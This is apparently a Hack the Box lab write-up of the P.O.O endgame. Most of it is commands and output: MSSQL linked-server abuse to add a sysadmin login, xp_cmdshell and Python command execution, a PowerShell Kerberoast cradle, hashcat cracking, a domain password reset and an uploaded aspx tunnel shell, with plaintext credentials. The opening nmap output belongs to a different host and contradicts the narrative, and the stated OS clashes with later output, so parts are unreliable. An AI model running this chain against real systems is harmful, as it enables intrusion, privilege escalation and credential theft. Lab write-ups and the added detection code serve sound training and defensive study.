Hack the Box – P.O.O (writeup published after the box retired in June 2020)

As usual, I add the IP of the machine to /etc/hosts as poo.htb.
To start off, I perform a port discovery to see what I can find.
nmap -p- -sT -sV -sC -oN initial-scan

E:\PENTEST>nmap -A -oN htb-endgame-xen
Starting Nmap 7.70 ( ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for (
Host is up (0.024s latency).
Not shown: 997 filtered ports
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| sequence of commands
| sequence of commands
| Hello:
| EHLO Invalid domain address.
| Help:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject:
| Subject Alternative Name:
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
1 24.00 ms
2 24.00 ms (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

We have discovered a few open ports. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the web pages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones for me to look at seemed to be the ‘admin’ folder and the ‘.DS_Store’ file: admin indicates an area of privilege, and .DS_Store files generally hold information about the folder they reside in.
Admin Directory
I browsed to and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using


We have some interesting directories. I ran the IIS Shortname scanner located at to see if I could come up with anything interesting, and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.

These seemed to be the details for a SQL database. And we have our first flag.


Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag;
SELECT * FROM dbo.flag;
This gave us another flag.

Creating an SQL user puckie in SQL Management Studio

-- Run through the POO_CONFIG linked server: who are we there, which logins are sysadmin, and which servers does it link to?
EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
-- Double hop: POO_CONFIG links back to POO_PUBLIC, so the inner EXEC runs there (quotes are doubled once per layer).
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
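The nested statements above are hard to read because every EXEC ... AT layer doubles the quotes of the statement it forwards. The following Python is an added example, not part of the original writeup: it peels the layers off a statement and lists the linked servers it passes through, using the statements from this writeup as sample input.

```python
import re

# One hop looks like:  EXEC ('<inner statement>') AT [<linked server>];
# Greedy .* with DOTALL makes the last "') AT [...]" win, i.e. the outermost layer.
HOP_RE = re.compile(r"^\s*EXEC\s*\('(.*)'\)\s*at\s*\[([^\]]+)\]\s*;?\s*$",
                    re.IGNORECASE | re.DOTALL)

# Statements copied verbatim from the writeup above, used here as data.
PAGE_STATEMENTS = [
    r"EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];",
    r"EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];",
]


def unwrap_exec_at(statement):
    """Peel nested EXEC ('...') AT [server] layers.

    Returns (hops, final_statement): hops is the list of linked servers in the
    order the statement is forwarded, final_statement is what the last server
    actually runs. T-SQL escapes a quote inside a string literal as '', so
    every layer adds one doubling; undoing one doubling per hop reverses it.
    """
    hops = []
    current = statement.strip()
    while True:
        m = HOP_RE.match(current)
        if not m:
            return hops, current
        inner, server = m.group(1), m.group(2)
        hops.append(server)
        current = inner.replace("''", "'").strip()


if __name__ == "__main__":
    for stmt in PAGE_STATEMENTS:
        hops, final = unwrap_exec_at(stmt)
        print(" -> ".join(hops) + " runs: " + final)
```

For the sp_addlogin statement this prints the two hops (POO_CONFIG, then back to POO_PUBLIC) and the plain statement that the final server executes.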


SHELL Access
I needed to enable xp_cmdshell.

Now that I had sysadmin rights on the instance, I decided to use to try and gain a shell on the box.
python3 from

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.

After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page

Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file, which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name="Block network access for R local user accounts in SQL Server instance POO_PUBLIC"

And then I noticed an IPv6 address and another adapter.

I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open: WinRM on 5985. I had credentials, so I now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-winrm to find the 4th flag

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt

I wanted to see what I could find out about the domain. Knowing that the box is on a domain, I was hoping for some Kerberos tickets that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier.

I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This came back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.

I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

I proceeded to run these 2 tickets through hashcat with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.

However, when I ran the p00_adm ticket through rockyou, it did not return any results. I then decided to run the ticket through all passwords found in all text files within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
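From the defender's side, the Kerberoast step above shows up in the domain controller's Security log as event 4769 entries with TicketEncryptionType 0x17 (RC4) for user accounts that own SPNs, the etype behind hashcat mode 13100. This Python is an added example, not from the original writeup: it flags requesters that pull RC4 service tickets for several such accounts. The event lines, the requester name svc_sql and the client IP are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of Windows Security event 4769 fields (one event per
# line), not logs taken from the box. TicketEncryptionType 0x17 is RC4-HMAC,
# the etype behind the $krb5tgs$23$ hashes that hashcat mode 13100 cracks;
# 0x12 is AES256. The requester svc_sql and the client IP are assumptions.
SAMPLE_4769 = """\
TargetUserName=Administrator@POO.LOCAL ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.5
TargetUserName=svc_sql@POO.LOCAL ServiceName=p00_hr TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5
TargetUserName=svc_sql@POO.LOCAL ServiceName=p00_adm TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5
TargetUserName=mr3ks@POO.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5
TargetUserName=mr3ks@POO.LOCAL ServiceName=COMPATIBILITY$ TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.5
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
RC4_HMAC = 0x17


def parse_4769(text):
    """Turn one key=value event per line into a list of dicts."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def is_roastable_request(event):
    """True for an RC4 service ticket whose SPN belongs to a user account.

    Machine accounts (names ending in $) have long random passwords and
    krbtgt tickets are TGTs, so neither is a Kerberoast target.
    """
    service = event.get("ServiceName", "")
    try:
        etype = int(event.get("TicketEncryptionType", "0"), 16)
    except ValueError:
        return False
    return etype == RC4_HMAC and not service.endswith("$") and service.lower() != "krbtgt"


def kerberoast_suspects(events, min_services=2):
    """Requesters that pulled RC4 tickets for at least min_services distinct
    user SPNs. Returns {requester: sorted service names}."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in seen.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    for user, services in kerberoast_suspects(parse_4769(SAMPLE_4769)).items():
        print(f"{user} requested RC4 tickets for {', '.join(services)}")
```

A single RC4 request can be a legacy client, so the threshold on distinct SPNs per requester in a short window is what separates a roast from normal traffic.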

Now that I had both of these passwords cracked, I needed to try and gain access to the domain controller, which was on

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1

Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account named mr3ks.

PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username, $pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx

I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now for me to create my tunnel with reGeorg.

python ./ -p 10000 -u

I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with direct access to the Domain Controller as a domain admin.
I could now look for the final flag.

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type:
dism /online /enable-feature /featurename:NetFx4Extended-ASPNET45 -All


kali@kali:~/htb$ python -p 1433 external_user:#p00Public3xt3rnalUs3r#@ 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd



msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against

[*] - Attempting to connect to the database server at as external_user...
[+] - Connected.
[*] - SQL Server Name: COMPATIBILITY
[*] - Domain Name: POO
[+] - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] - - POO\Administrator
[*] - - POO\Guest
[*] - - POO\krbtgt
[*] - - POO\DefaultAccount
[*] - - POO\Domain Admins
[*] - - POO\Domain Users
[*] - - POO\Domain Guests
[*] - - POO\Domain Computers
[*] - - POO\Domain Controllers
[*] - - POO\Cert Publishers
[*] - - POO\Schema Admins
[*] - - POO\Enterprise Admins
[*] - - POO\Group Policy Creator Owners
[*] - - POO\Read-only Domain Controllers
[*] - - POO\Cloneable Domain Controllers
[*] - - POO\Protected Users
[*] - - POO\Key Admins
[*] - - POO\Enterprise Key Admins
[*] - - POO\RAS and IAS Servers
[*] - - POO\Allowed RODC Password Replication Group
[*] - - POO\Denied RODC Password Replication Group
[*] - - POO\mr3ks
[*] - - POO\DC$
[*] - - POO\DnsAdmins
[*] - - POO\DnsUpdateProxy
[*] - - POO\p00_hr
[*] - - POO\p00_dev
[*] - - POO\p00_adm
[*] - - POO\P00 Help Desk
[+] - 31 user accounts, groups, and computer accounts were found.
[*] - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed

msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts
rhosts =>
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against

[*] - Running MS SQL Server Enumeration...
[*] - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] - Configuration Parameters:
[*] - C2 Audit Mode is Not Enabled
[*] - xp_cmdshell is Enabled
[*] - remote access is Enabled
[*] - allow updates is Not Enabled
[*] - Database Mail XPs is Not Enabled
[*] - Ole Automation Procedures are Not Enabled
[*] - Databases on the server:
[*] - Database name:master
[*] - Database Files for master:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] - Database name:tempdb
[*] - Database Files for tempdb:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] - Database name:POO_PUBLIC
[*] - Database Files for POO_PUBLIC:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] - System Logins on this Server:
[*] - sa
[*] - external_user
[*] - Disabled Accounts:
[*] - No Disabled Logins Found
[*] - No Accounts Policy is set for:
[*] - All System Accounts have the Windows Account Policy Applied to them.
[*] - Password Expiration is not checked for:
[*] - sa
[*] - external_user
[*] - System Admin Logins on this Server:
[*] - sa
[*] - Windows Logins on this Server:
[*] - No Windows logins found!
[*] - Windows Groups that can logins on this Server:
[*] - No Windows Groups where found with permission to login to system.
[*] - Accounts with Username and Password being the same:
[*] - No Account with its password being the same as its username was found.
[*] - Accounts with empty password:
[*] - No Accounts with empty passwords where found.
[*] - Stored Procedures with Public Execute Permission found:
[*] - sp_replsetsyncstatus
[*] - sp_replcounters
[*] - sp_replsendtoqueue
[*] - sp_resyncexecutesql
[*] - sp_prepexecrpc
[*] - sp_repltrans
[*] - sp_xml_preparedocument
[*] - xp_qv
[*] - xp_getnetname
[*] - sp_releaseschemalock
[*] - sp_refreshview
[*] - sp_replcmds
[*] - sp_unprepare
[*] - sp_resyncprepare
[*] - sp_createorphan
[*] - xp_dirtree
[*] - sp_replwritetovarbin
[*] - sp_replsetoriginator
[*] - sp_xml_removedocument
[*] - sp_repldone
[*] - sp_reset_connection
[*] - xp_fileexist
[*] - xp_fixeddrives
[*] - sp_getschemalock
[*] - sp_prepexec
[*] - xp_revokelogin
[*] - sp_execute_external_script
[*] - sp_resyncuniquetable
[*] - sp_replflush
[*] - sp_resyncexecute
[*] - xp_grantlogin
[*] - sp_droporphans
[*] - xp_regread
[*] - sp_getbindtoken
[*] - sp_replincrementlsn
[*] - Instances found on this server:
[*] - Default Server Instance SQL Server Service is running under the privilege of:
[*] - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle

